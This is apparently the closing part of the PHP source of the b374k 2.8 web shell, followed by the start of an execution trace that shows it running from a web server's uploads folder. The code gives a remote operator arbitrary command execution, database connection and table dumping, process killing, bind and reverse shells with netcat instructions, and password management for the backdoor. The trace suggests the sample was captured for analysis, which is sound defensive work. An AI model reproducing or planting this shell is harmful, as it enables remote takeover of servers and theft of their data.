            foreach ($_COOKIE['c'] as $c => $d) {
                if ($c == $s_sql_deleted) {
                    continue;
                }
                $s_dbcon = function_exists("json_encode") && function_exists("json_decode") ? json_decode($d) : unserialize($d);
                foreach ($s_dbcon as $k => $v) {
                    $s_sql[$k] = $v;
                }
                $s_sqlport = !empty($s_sql['port']) ? ":" . $s_sql['port'] : "";
                $s_result .= notif("[" . $s_sql['type'] . "] " . $s_sql['user'] . "@" . $s_sql['host'] . $s_sqlport . "\n                            <span style='float:right;'><a href='" . $s_self . "x=db&connect=connect&sqlhost=" . pl($s_sql['host']) . "&sqlport=" . pl($s_sql['port']) . "&sqluser=" . pl($s_sql['user']) . "&sqlpass=" . pl($s_sql['pass']) . "&sqltype=" . pl($s_sql['type']) . "'>connect</a> | <a href='" . $s_self . "x=db&dc=" . pl($c) . "'>disconnect</a></span>");
            }
        } else {
            $s_sql['host'] = isset($_GP['sqlhost']) ? $_GP['sqlhost'] : "";
            $s_sql['port'] = isset($_GP['sqlport']) ? $_GP['sqlport'] : "";
            $s_sql['user'] = isset($_GP['sqluser']) ? $_GP['sqluser'] : "";
            $s_sql['pass'] = isset($_GP['sqlpass']) ? $_GP['sqlpass'] : "";
            $s_sql['type'] = isset($_GP['sqltype']) ? $_GP['sqltype'] : "";
        }
        if (isset($_GP['connect'])) {
            $s_con = sql_connect($s_sql['type'], $s_sql['host'], $s_sql['user'], $s_sql['pass']);
            $s_sqlcode = isset($_GP['sqlcode']) ? $_GP['sqlcode'] : "";
            if ($s_con !== false) {
                if (isset($_GP['sqlinit'])) {
                    $s_sql_cookie = function_exists("json_encode") && function_exists("json_decode") ? json_encode($s_sql) : serialize($s_sql);
                    $s_c_num = substr(md5(time() . rand(0, 100)), 0, 3);
                    while (isset($_COOKIE['c']) && is_array($_COOKIE['c']) && array_key_exists($s_c_num, $_COOKIE['c'])) {
                        $s_c_num = substr(md5(time() . rand(0, 100)), 0, 3);
                    }
                    setcookie("c[" . $s_c_num . "]", $s_sql_cookie, time() + $s_login_time);
                }
                $s_show_form = false;
                $s_result .= "<form action='" . $s_self . "' method='post'>\n                    <input type='hidden' name='sqlhost' value='" . hss($s_sql['host']) . "' />\n                    <input type='hidden' name='sqlport' value='" . hss($s_sql['port']) . "' />\n                    <input type='hidden' name='sqluser' value='" . hss($s_sql['user']) . "' />\n                    <input type='hidden' name='sqlpass' value='" . hss($s_sql['pass']) . "' />\n                    <input type='hidden' name='sqltype' value='" . hss($s_sql['type']) . "' />\n                    <input type='hidden' name='x' value='db' />\n                    <input type='hidden' name='connect' value='connect' />\n                    <textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>" . hss($s_sqlcode) . "</textarea>\n                    <p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />\n                    &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>\n                    </form>";
                if (!empty($s_sqlcode)) {
                    $s_querys = explode(";", $s_sqlcode);
                    foreach ($s_querys as $s_query) {
                        if (trim($s_query) != "") {
                            $s_hasil = sql_query($s_sql['type'], $s_query, $s_con);
                            if ($s_hasil != false) {
                                $s_result .= "<hr /><p style='padding:0;margin:6px 10px;font-weight:bold;'>" . hss($s_query) . ";&nbsp;&nbsp;&nbsp;\n                                <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";
                                if (!is_bool($s_hasil)) {
                                    $s_result .= "<table class='explore sortable' style='width:100%;'><tr>";
                                    for ($s_i = 0; $s_i < sql_num_fields($s_sql['type'], $s_hasil); $s_i++) {
                                        $s_result .= "<th>" . @hss(sql_field_name($s_sql['type'], $s_hasil, $s_i)) . "</th>";
                                    }
                                    $s_result .= "</tr>";
                                    while ($s_rows = sql_fetch_data($s_sql['type'], $s_hasil)) {
                                        $s_result .= "<tr>";
                                        foreach ($s_rows as $s_r) {
                                            if (empty($s_r)) {
                                                $s_r = " ";
                                            }
                                            $s_result .= "<td>" . @hss($s_r) . "</td>";
                                        }
                                        $s_result .= "</tr>";
                                    }
                                    $s_result .= "</table>";
                                }
                            } else {
                                $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>" . hss($s_query) . ";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> error <span class='gaya'>]</span></p>";
                            }
                        }
                    }
                } else {
                    if ($s_sql['type'] != 'pdo' && $s_sql['type'] != 'odbc') {
                        if ($s_sql['type'] == 'mysql') {
                            $s_showdb = "SHOW DATABASES";
                        } elseif ($s_sql['type'] == 'mssql') {
                            $s_showdb = "SELECT name FROM master..sysdatabases";
                        } elseif ($s_sql['type'] == 'pgsql') {
                            $s_showdb = "SELECT schema_name FROM information_schema.schemata";
                        } elseif ($s_sql['type'] == 'oracle') {
                            $s_showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME";
                        } elseif ($s_sql['type'] == 'sqlite3' || $s_sql['type'] == 'sqlite') {
                            $s_showdb = "SELECT \"" . $s_sql['host'] . "\"";
                        } else {
                            $s_showdb = "SHOW DATABASES";
                        }
                        $s_hasil = sql_query($s_sql['type'], $s_showdb, $s_con);
                        if ($s_hasil != false) {
                            while ($s_rows_arr = sql_fetch_data($s_sql['type'], $s_hasil)) {
                                foreach ($s_rows_arr as $s_rows) {
                                    $s_result .= "<p class='notif' onclick=\"toggle('db_" . $s_rows . "')\">" . $s_rows . "</p>";
                                    $s_result .= "<div class='info' id='db_" . $s_rows . "'><table class='explore'>";
                                    if ($s_sql['type'] == 'mysql') {
                                        $s_showtbl = "SHOW TABLES FROM " . $s_rows;
                                    } elseif ($s_sql['type'] == 'mssql') {
                                        $s_showtbl = "SELECT name FROM " . $s_rows . "..sysobjects WHERE xtype = 'U'";
                                    } elseif ($s_sql['type'] == 'pgsql') {
                                        $s_showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='" . $s_rows . "'";
                                    } elseif ($s_sql['type'] == 'oracle') {
                                        $s_showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='" . $s_rows . "'";
                                    } elseif ($s_sql['type'] == 'sqlite3' || $s_sql['type'] == 'sqlite') {
                                        $s_showtbl = "SELECT name FROM sqlite_master WHERE type='table'";
                                    } else {
                                        $s_showtbl = "";
                                    }
                                    $s_hasil_t = sql_query($s_sql['type'], $s_showtbl, $s_con);
                                    if ($s_hasil_t != false) {
                                        while ($s_tables_arr = sql_fetch_data($s_sql['type'], $s_hasil_t)) {
                                            foreach ($s_tables_arr as $s_tables) {
                                                if ($s_sql['type'] == 'mysql') {
                                                    $s_dump_tbl = "SELECT * FROM " . $s_rows . "." . $s_tables . " LIMIT 0,100";
                                                } elseif ($s_sql['type'] == 'mssql') {
                                                    $s_dump_tbl = "SELECT TOP 100 * FROM " . $s_rows . ".." . $s_tables;
                                                } elseif ($s_sql['type'] == 'pgsql') {
                                                    $s_dump_tbl = "SELECT * FROM " . $s_rows . "." . $s_tables . " LIMIT 100 OFFSET 0";
                                                } elseif ($s_sql['type'] == 'oracle') {
                                                    $s_dump_tbl = "SELECT * FROM " . $s_rows . "." . $s_tables . " WHERE ROWNUM BETWEEN 0 AND 100;";
                                                } elseif ($s_sql['type'] == 'sqlite' || $s_sql['type'] == 'sqlite3') {
                                                    $s_dump_tbl = "SELECT * FROM " . $s_tables . " LIMIT 0,100";
                                                } else {
                                                    $s_dump_tbl = "";
                                                }
                                                $s_dump_tbl_link = $s_self . "x=db&connect=&sqlhost=" . pl($s_sql['host']) . "&sqlport=" . pl($s_sql['port']) . "&sqluser=" . pl($s_sql['user']) . "&sqlpass=" . pl($s_sql['pass']) . "&sqltype=" . pl($s_sql['type']) . "&sqlcode=" . pl($s_dump_tbl);
                                                $s_result .= "<tr><td ondblclick=\"return go('" . adds($s_dump_tbl_link) . "',event);\"><a href='" . $s_dump_tbl_link . "'>" . $s_tables . "</a></td></tr>";
                                            }
                                        }
                                    }
                                    $s_result .= "</table></div>";
                                }
                            }
                        }
                    }
                }
                sql_close($s_sql['type'], $s_con);
            } else {
                $s_result .= notif("Unable to connect to database");
                $s_show_form = true;
            }
        }
        if ($s_show_form) {
            // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
            $s_sqllist = array();
            if (function_exists("mysql_connect")) {
                $s_sqllist["mysql"] = "Connect to MySQL <span class='desc' style='font-size:12px;'>- using class mysqli or mysql_*</span>";
            }
            if (function_exists("mssql_connect") || function_exists("sqlsrv_connect")) {
                $s_sqllist["mssql"] = "Connect to MsSQL <span class='desc' style='font-size:12px;'>- using sqlsrv_* or mssql_*</span>";
            }
            if (function_exists("pg_connect")) {
                $s_sqllist["pgsql"] = "Connect to PostgreSQL <span class='desc' style='font-size:12px;'>- using pg_*</span>";
            }
            if (function_exists("oci_connect")) {
                $s_sqllist["oracle"] = "Connect to oracle <span class='desc' style='font-size:12px;'>- using oci_*</span>";
            }
            if (function_exists("sqlite_open")) {
                $s_sqllist["sqlite"] = "Connect to SQLite <span class='desc' style='font-size:12px;'>- using sqlite_*</span>";
            }
            if (class_exists("SQLite3")) {
                $s_sqllist["sqlite3"] = "Connect to SQLite3 <span class='desc' style='font-size:12px;'>- using class SQLite3</span>";
            }
            if (function_exists("odbc_connect")) {
                $s_sqllist["odbc"] = "Connect via ODBC <span class='desc' style='font-size:12px;'>- using odbc_*</span>";
            }
            if (class_exists("PDO")) {
                $s_sqllist["pdo"] = "Connect via PDO <span class='desc' style='font-size:12px;'>- using class PDO</span>";
            }
            foreach ($s_sqllist as $s_sql['type'] => $s_sqltitle) {
                if ($s_sql['type'] == "odbc" || $s_sql['type'] == "pdo") {
                    $s_result .= "<div class='mybox'><h2>" . $s_sqltitle . "</h2>\n                    <form action='" . $s_self . "' method='post' />\n                    <table class='myboxtbl'>\n                    <tr><td style='width:170px;'>DSN / Connection String</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>\n                    <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>\n                    <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>\n                    </table>\n                    <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n                    <input type='hidden' name='sqltype' value='" . $s_sql['type'] . "' />\n                    <input type='hidden' name='sqlinit' value='init' />\n                    <input type='hidden' name='x' value='db' />\n                    </form>\n                    </div>";
                } elseif ($s_sql['type'] == "sqlite" || $s_sql['type'] == "sqlite3") {
                    $s_result .= "<div class='mybox'><h2>" . $s_sqltitle . "</h2>\n                    <form action='" . $s_self . "' method='post' />\n                    <table class='myboxtbl'>\n                    <tr><td style='width:170px;'>DB File</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>\n                    </table>\n                    <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n                    <input type='hidden' name='sqltype' value='" . $s_sql['type'] . "' />\n                    <input type='hidden' name='sqlinit' value='init' />\n                    <input type='hidden' name='x' value='db' />\n                    </form>\n                    </div>";
                } else {
                    $s_result .= "<div class='mybox'><h2>" . $s_sqltitle . "</h2>\n                    <form action='" . $s_self . "' method='post' />\n                    <table class='myboxtbl'>\n                    <tr><td style='width:170px;'>Host</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>\n                    <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>\n                    <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>\n                    <tr><td>Port (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='sqlport' value='' /></td></tr>\n                    </table>\n                    <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n                    <input type='hidden' name='sqltype' value='" . $s_sql['type'] . "' />\n                    <input type='hidden' name='sqlinit' value='init' />\n                    <input type='hidden' name='x' value='db' />\n                    </form>\n                    </div>";
                }
            }
        }
    } elseif (isset($_GP['x']) && $_GP['x'] == 'rs') {
        // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php
        $s_rshost = $s_server_ip;
        $s_rsport = "13123";
        // default port
        $s_rspesana = "Press &#39;  Go !  &#39; button and run &#39;  nc <i>server_ip</i> <i>port</i>  &#39; on your computer";
        $s_rspesanb = "Run &#39;  nc -l -v -p <i>port</i>  &#39; on your computer and press &#39;  Go !  &#39; button";
        $s_rs_err = "";
        $s_rsbind = $s_rsback = array();
        $s_rsbind["bind_php"] = "Bind Shell <span class='desc' style='font-size:12px;'>- php</span>";
        $s_rsback["back_php"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- php</span>";
        $s_access = array("s_python" => "py", "s_perl" => "pl", "s_ruby" => "rb", "s_node" => "js", "s_nodejs" => "js", "s_gcc" => "c", "s_javac" => "java");
        foreach ($s_access as $k => $v) {
            if (isset(${$k})) {
                $s_t = explode("_", $k);
                $s_rsbind["bind_" . $v] = "Bind Shell <span class='desc' style='font-size:12px;'>- " . $s_t[1] . "</span>";
                $s_rsback["back_" . $v] = "Reverse Shell <span class='desc' style='font-size:12px;'>- " . $s_t[1] . "</span>";
            }
        }
        if ($s_win) {
            $s_rsbind["bind_win"] = "Bind Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
            $s_rsback["back_win"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
        }
        $s_rslist = array_merge($s_rsbind, $s_rsback);
        if (!@is_writable($s_cwd)) {
            $s_result .= notif("Directory " . $s_cwd . " is not writable, please change to a writable one");
        }
        foreach ($s_rslist as $s_rstype => $s_rstitle) {
            $s_split = explode("_", $s_rstype);
            if ($s_split[0] == "bind") {
                $s_rspesan = $s_rspesana;
                $s_rsdisabled = "disabled='disabled'";
                $s_rstarget = $s_server_ip;
                $s_labelip = "Server IP";
            } elseif ($s_split[0] == "back") {
                $s_rspesan = $s_rspesanb;
                $s_rsdisabled = "";
                $s_rstarget = $s_my_ip;
                $s_labelip = "Target IP";
            }
            if (isset($_GP[$s_rstype])) {
                if (isset($_GP["rshost_" . $s_rstype])) {
                    $s_rshost_ = $_GP["rshost_" . $s_rstype];
                }
                if (isset($_GP["rsport_" . $s_rstype])) {
                    $s_rsport_ = $_GP["rsport_" . $s_rstype];
                }
                if ($s_split[0] == "bind") {
                    $s_rstarget_packed = $s_rsport_;
                } elseif ($s_split[0] == "back") {
                    $s_rstarget_packed = $s_rsport_ . " " . $s_rshost_;
                }
                if ($s_split[1] == "pl") {
                    $s_rscode = $s_rs_pl;
                } elseif ($s_split[1] == "py") {
                    $s_rscode = $s_rs_py;
                } elseif ($s_split[1] == "rb") {
                    $s_rscode = $s_rs_rb;
                } elseif ($s_split[1] == "js") {
                    $s_rscode = $s_rs_js;
                } elseif ($s_split[1] == "c") {
                    $s_rscode = $s_rs_c;
                } elseif ($s_split[1] == "java") {
                    $s_rscode = $s_rs_java;
                } elseif ($s_split[1] == "win") {
                    $s_rscode = $s_rs_win;
                } elseif ($s_split[1] == "php") {
                    $s_rscode = $s_rs_php;
                }
                $s_buff = rs($s_rstype, $s_rstarget_packed, $s_rscode);
                if ($s_buff != "") {
                    $s_rs_err = notif(hss($s_buff));
                }
            }
            $s_result .= "<div class='mybox'><h2>" . $s_rstitle . "</h2>\n            <form action='" . $s_self . "' method='post' />\n            <table class='myboxtbl'>\n            <tr><td style='width:100px;'>" . $s_labelip . "</td><td><input " . $s_rsdisabled . " style='width:100%;' class='inputz' type='text' name='rshost_" . $s_rstype . "' value='" . hss($s_rstarget) . "' /></td></tr>\n            <tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='rsport_" . $s_rstype . "' value='" . hss($s_rsport) . "' /></td></tr>\n            </table>\n            <input type='submit' name='" . $s_rstype . "' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n            &nbsp;&nbsp;<span>" . $s_rspesan . "</span>\n            <input type='hidden' name='x' value='rs' />\n            </form>\n            </div>";
        }
        $s_result = $s_rs_err . $s_result;
    } elseif (isset($_GP['x']) && $_GP['x'] == 'ps') {
        $s_buff = "";
        // kill process specified by pid
        if (isset($_GP['pid'])) {
            $s_p = trim($_GP['pid'], "|");
            $s_parr = explode("|", $s_p);
            foreach ($s_parr as $s_p) {
                if (function_exists("posix_kill")) {
                    $s_buff .= posix_kill($s_p, '9') ? notif("Process with pid " . $s_p . " has been successfully killed") : notif("Unable to kill process with pid " . $s_p);
                } else {
                    if (!$s_win) {
                        $s_buff .= notif(exe("kill -9 " . $s_p));
                    } else {
                        $s_buff .= notif(exe("taskkill /F /PID " . $s_p));
                    }
                }
            }
        }
        if (!$s_win) {
            $s_h = "ps aux";
        } else {
            $s_h = "tasklist /V /FO csv";
        }
        // win
        $s_wcount = 11;
        $s_wexplode = " ";
        if ($s_win) {
            $s_wexplode = "\",\"";
        }
        $s_res = exe($s_h);
        if (trim($s_res) == '') {
            $s_result = notif("Error getting process list");
        } else {
            if ($s_buff != "") {
                $s_result = $s_buff;
            }
            $s_result .= "<table class='explore sortable'>";
            if (!$s_win) {
                $s_res = preg_replace('#\\ +#', ' ', $s_res);
            }
            $s_psarr = explode("\n", $s_res);
            $s_fi = true;
            $s_tblcount = 0;
            $s_check = explode($s_wexplode, $s_psarr[0]);
            $s_wcount = count($s_check);
            foreach ($s_psarr as $s_psa) {
                if (trim($s_psa) != '') {
                    if ($s_fi) {
                        $s_fi = false;
                        $s_psln = explode($s_wexplode, $s_psa, $s_wcount);
                        $s_result .= "<tr><th style='width:24px;' class='sorttable_nosort'></th><th class='sorttable_nosort'>action</th>";
                        foreach ($s_psln as $s_p) {
                            $s_result .= "<th>" . trim(trim(strtolower($s_p)), "\"") . "</th>";
                        }
                        $s_result .= "</tr>";
                    } else {
                        $s_psln = explode($s_wexplode, $s_psa, $s_wcount);
                        $s_result .= "<tr>";
                        $s_tblcount = 0;
                        foreach ($s_psln as $s_p) {
                            $s_pid = trim(trim($s_psln[1]), "\"");
                            $s_piduniq = substr(md5($s_pid), 0, 8);
                            if (trim($s_p) == "") {
                                $s_p = "&nbsp;";
                            }
                            if ($s_tblcount == 0) {
                                $s_result .= "<td style='text-align:center;text-indent:4px;'><input id='" . $s_piduniq . "' name='cbox' value='" . $s_pid . "' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='" . $s_piduniq . "' class='css-label'></label></td><td class='ce'><a href='" . $s_self . "x=ps&pid=" . $s_pid . "'>kill</a></td><td class='ce'>" . trim(trim($s_p), "\"") . "</td>";
                                $s_tblcount++;
                            } else {
                                $s_tblcount++;
                                if ($s_tblcount == count($s_psln)) {
                                    $s_result .= "<td class='le'>" . trim(trim($s_p), "\"") . "</td>";
                                } else {
                                    $s_result .= "<td class='ce'>" . trim(trim($s_p), "\"") . "</td>";
                                }
                            }
                        }
                        $s_result .= "</tr>";
                    }
                }
            }
            $colspan = count($s_psln) + 1;
            $s_result .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>\n            <form action='" . $s_self . "' method='post'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /><label for='checkalll' class='css-label'></label></form>\n            </td><td style='text-indent:10px;padding:2px;' colspan=" . $colspan . "><a href='javascript: pkill();'>kill selected <span id='total_selected'></span></a></td>\n            </tr></tfoot></table>";
        }
    } elseif (isset($_GP['x']) && $_GP['x'] == 'pass') {
        if (isset($_GP['submitnewpass'])) {
            $newpass = isset($_GP['newpass']) ? trim($_GP['newpass']) : "";
            $newpassx = isset($_GP['newpassx']) ? trim($_GP['newpassx']) : "";
            if (empty($newpass) || empty($newpassx)) {
                $s_result .= notif('Give your new password to both fields');
            } elseif ($newpass != $newpassx) {
                $s_result .= notif('Password does not match');
            } else {
                if (changepass($newpass)) {
                    $s_result .= notif("Password changed");
                } else {
                    $s_result .= notif("Unable to change password");
                }
            }
        }
        $s_result .= "<div class='mybox'><h2>Change shell password</h2>\n            <form action='" . $s_self . "' method='post' />\n            <table class='myboxtbl'>\n            <tr><td style='width:120px;'>New password</td><td><input style='width:100%;' class='inputz' type='password' name='newpass' value='' /></td></tr>\n            <tr><td style='width:120px;'>Confirm password</td><td><input style='width:100%;' class='inputz' type='password' name='newpassx' value='' /></td></tr>\n            </table>\n            <input type='submit' name='submitnewpass' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n            <input type='hidden' name='x' value='pass' />\n            </form>\n            </div>";
    } else {
        if (!isset($s_cwd)) {
            $s_cwd = "";
        }
        if (isset($_GP['cmd'])) {
            $s_cmd = $_GP['cmd'];
            if (strlen($s_cmd) > 0) {
                if (preg_match('#^cd(\\ )+(.*)#', $s_cmd, $s_r)) {
                    $s_nd = trim($s_r[2]);
                    if (@is_dir($s_nd)) {
                        chdir($s_nd);
                        $s_cwd = cp(getcwd());
                        setcookie("cwd", $s_cwd, time() + $s_login_time);
                        $s_result .= showdir($s_cwd);
                    } elseif (@is_dir($s_cwd . $s_nd)) {
                        chdir($s_cwd . $s_nd);
                        $s_cwd = cp(getcwd());
                        setcookie("cwd", $s_cwd, time() + $s_login_time);
                        $s_result .= showdir($s_cwd);
                    } else {
                        $s_result .= notif(hss($s_nd) . " is not a directory");
                    }
                } else {
                    $s_r = hss(exe($s_cmd));
                    if ($s_r != '') {
                        $s_result .= "<pre>" . $s_r . "</pre>";
                    } else {
                        $s_result .= showdir($s_cwd);
                    }
                }
            } else {
                $s_result .= showdir($s_cwd);
            }
        } else {
            $s_result .= showdir($s_cwd);
        }
    }
    // find drive letters
    $s_letters = '';
    $s_v = explode("\\", $s_cwd);
    $s_v = $s_v[0];
    foreach (range("A", "Z") as $s_letter) {
        if (@is_readable($s_letter . ":\\")) {
            $s_letters .= "<a href='" . $s_self . "cd=" . $s_letter . ":\\'>[ ";
            if ($s_letter . ":" != $s_v) {
                $s_letters .= $s_letter;
            } else {
                $s_letters .= "<span class='drive-letter'>" . $s_letter . "</span>";
            }
            $s_letters .= " ]</a> ";
        }
    }
    // print useful info
    $s_info = "<table class='headtbl'><tr><td>" . $s_system . "</td></tr>";
    $s_info .= "<tr><td>" . $s_software . "</td></tr>";
    $s_info .= "<tr><td>server ip : " . $s_server_ip . "<span class='gaya'> | </span>your   ip : " . $s_my_ip;
    $s_info .= "<span class='gaya'> | </span> Time @ Server : " . @date("d M Y H:i:s", time());
    $s_info .= "</td></tr>\n            <tr><td style='text-align:left;'>\n                <table class='headtbls'><tr>\n                <td>" . trim($s_letters) . "</td>\n                <td>\n                <span id='chpwd'>\n                &nbsp;<a href=\"javascript:tukar_('chpwd','chpwdform')\">\n                <span class='icon'>o</span>\n                &nbsp;&nbsp;</a>" . swd($s_cwd) . "</span>\n                <form action='" . $s_self . "' method='post' style='margin:0;padding:0;'>\n                <span class='sembunyi' id='chpwdform'>\n                &nbsp;<a href=\"javascript:tukar_('chpwdform','chpwd');\">\n                <span class='icon'>o</span>\n                </a>&nbsp;&nbsp;\n                <input type='text' name='view' class='inputz' style='width:300px;' value='" . hss($s_cwd) . "' />\n                <input class='inputzbut' type='submit' name='submit' value='view file / folder' />\n                </span>\n                </form>\n                </td></tr>\n                </table>\n            </td></tr>\n            </table>";
}
$s_error = @ob_get_contents();
$s_result = isset($s_result) ? $s_result : "";
if (!empty($s_error)) {
    $s_result = notif($s_error) . $s_result;
}
@ob_end_clean();
@ob_start();
?><!DOCTYPE html>
<html>
<head>
<title><?php 
echo $s_title;
?></title>
<meta charset="utf-8">
<meta name='robots' content='noindex, nofollow, noarchive'>
<link rel='SHORTCUT ICON' href='<?php 
echo $s_favicon;
?>'>
<?php 
echo get_code("css", $s_css);
?>
</head>
<body>
<table id='main'><tr><td>
<?php 
if ($s_auth) {
    ?>
    <div><span style='float:right;'><?php 
    if (!isset($_COOKIE['b374k_included'])) {
        ?><a href='?x=pass'>password</a> | 
    <?php 
    }
    ?><a href='<?php 
    echo $s_self;
    ?>x=logout' title='Click me to log out'>log out</a>  <a href='<?php 
    echo $s_self;
    ?>x=switch' title='Click me to change theme'><span class='schemabox'>&nbsp;&nbsp;</span></a></span><table id='header'><tr><td style='width:80px;'><table><tr><td><h1><a href='<?php 
    echo $s_self . "cd=" . cp(dirname(realpath($_SERVER['SCRIPT_FILENAME'])));
    ?>'>b374k</a></h1></td></tr><tr><td style='text-align:right;'><div class='ver'><?php 
    echo $s_ver;
    ?></div></td></tr></table></td>   <td><div class='headinfo'><?php 
    echo $s_info;
    ?></div></td></tr></table></div>
    <div style='clear:both;'></div>
    <form method='post' name='g'></form>
    <div id='menu'>
        <table style='width:100%;'><tr>
        <td><a href='<?php 
    echo $s_self;
    ?>' title='Explorer'><div class='menumi'>xpl</div></a></td>
        <td><a href='<?php 
    echo $s_self;
    ?>x=ps' title='Display process status'><div class='menumi'>ps</div></a></td>
        <td><a href='<?php 
    echo $s_self;
    ?>x=eval' title='Execute code'><div class='menumi'>eval</div></a></td>
        <td><a href='<?php 
    echo $s_self;
    ?>x=info' title='Information about server'><div class='menumi'>info</div></a></td>
        <td><a href='<?php 
    echo $s_self;
    ?>x=db' title='Connect to database'><div class='menumi'>db</div></a></td>
        <td><a href='<?php 
    echo $s_self;
    ?>x=rs' title='Remote Shell'><div class='menumi'>rs</div></a></td>
        <td style='width:100%;padding:0 0 0 6px;'>
        <span class='prompt'><?php 
    echo $s_prompt;
    ?></span><form action='<?php 
    echo $s_self;
    ?>' method='post'>
        <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php 
    if (isset($_GP['cmd'])) {
        echo "";
    } else {
        echo "- shell command -";
    }
    ?>' />
        <noscript><input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' /></noscript>
        </form>
        </td>
        </tr></table>
    </div>
    <div id='content'>
        <div id='result'><?php 
    echo "__RESULT__";
    ?></div>
    </div>
    <div id='navigation'>
    <div id='totop' onclick='totopd();' onmouseover='totop();' onmouseout='stopscroll();'></div>
    <div id='tobottom' onclick='tobottomd();' onmouseover='tobottom();' onmouseout='stopscroll();'></div>
    </div>
<?php 
} else {
    ?>
    <div style='width:100%;text-align:center;'>
    <form action='<?php 
    echo $s_self;
    ?>' method='post'>
    <img src='<?php 
    echo $s_favicon;
    ?>' style='margin:2px;vertical-align:middle;' />
    b374k&nbsp;<span class='gaya'><?php 
    echo $s_ver;
    ?></span><input id='login' class='inputz' type='password' name='login' style='width:120px;' value='' />
    <input class='inputzbut' type='submit' value='Go !' name='submitlogin' style='width:80px;' />
    </form>
    </div>
<?php 
}
?>   </td></tr></table>
<p class='footer'>Jayalah Indonesiaku &copy;<?php 
echo @date("Y", time()) . " ";
?>b374k</p>
<?php 
echo $main_scs;
?>
<script type='text/javascript'>
var d = document;
var scroll = false;
var cwd = '<?php 
echo hss(adds($s_cwd));
?>';
var hexstatus = false;
var timer = '';
var x = '<?php 
if (isset($_GP['x']) && $_GP['x'] == 'ps') {
    echo "ps";
}
?>';
var sself = '<?php 
echo adds($s_self);
?>';
var hexcounter = 0;
var hextimer = '';
var counter = 0;

</script>
<?php 
echo get_code("js", $s_js);
?>
<script type='text/javascript'>
domready(function(){
    <?php 
if (isset($_GP['cmd'])) {
    echo "if(d.getElementById('cmd')) d.getElementById('cmd').focus();";
}
?>
    <?php 
if (isset($_GP['evalcode'])) {
    echo "if(d.getElementById('evalcode')) d.getElementById('evalcode').focus();";
}
?>
    <?php 
if (isset($_GP['sqlcode'])) {
    echo "if(d.getElementById('sqlcode')) d.getElementById('sqlcode').focus();";
}
?>
    <?php 
if (isset($_GP['login'])) {
    echo "if(d.getElementById('login')) d.getElementById('login').focus();";
}
?>
    <?php 
if (isset($_GP['hexedit'])) {
    echo "showhex();";
}
?>

    if(d.getElementById('cmd')) d.getElementById('cmd').setAttribute('autocomplete', 'off');

    var textareas = d.getElementsByTagName('textarea');
    var count = textareas.length;
    for(i = 0; i<count; i++){
        textareas[i].onkeydown = function(e){
            if(e.keyCode==9){
                e.preventDefault();
                var s = this.selectionStart;
                this.value = this.value.substring(0,this.selectionStart) + "\t" + this.value.substring(this.selectionEnd);
                this.selectionEnd = s+1;
            }
            else if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
                this.form.submit();
            }
        }
    }
    listen();
});
</script>
</body>
</html><?php 
$s_html = ob_get_contents();
ob_end_clean();
$whitespace = "/(\\s{2,}|\n{1,})/";
$s_html = preg_replace($whitespace, " ", $s_html);
$s_html = str_replace("__RESULT__", $s_result, $s_html);
echo $s_html;
die;

Execution traces

data/traces/3c2f6a5d11700dadb18b06e5f40e8117_trace-1676248375.6528.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:33:21.550655]
1	0	1	0.000150	393528
1	3	0	0.005450	1182952	{main}	1		/var/www/html/uploads/rtxcat.php	0	0
1		A						/var/www/html/uploads/rtxcat.php	3	$s_pass = 'fb621f5060b9f65acf8eb4232e3024140dea2b34'
1		A						/var/www/html/uploads/rtxcat.php	5	$s_ver = '2.8'
1		A						/var/www/html/uploads/rtxcat.php	6	$s_title = 'b374k 2.8'
1		A						/var/www/html/uploads/rtxcat.php	7	$s_login_time = 604800
1		A						/var/www/html/uploads/rtxcat.php	8	$s_debug = FALSE
2	4	0	0.005556	1182992	ob_start	0		/var/www/html/uploads/rtxcat.php	10	0
2	4	1	0.005570	1199504
2	4	R			TRUE
2	5	0	0.005585	1199504	set_time_limit	0		/var/www/html/uploads/rtxcat.php	11	1	0
2	5	1	0.005603	1199568
2	5	R			FALSE
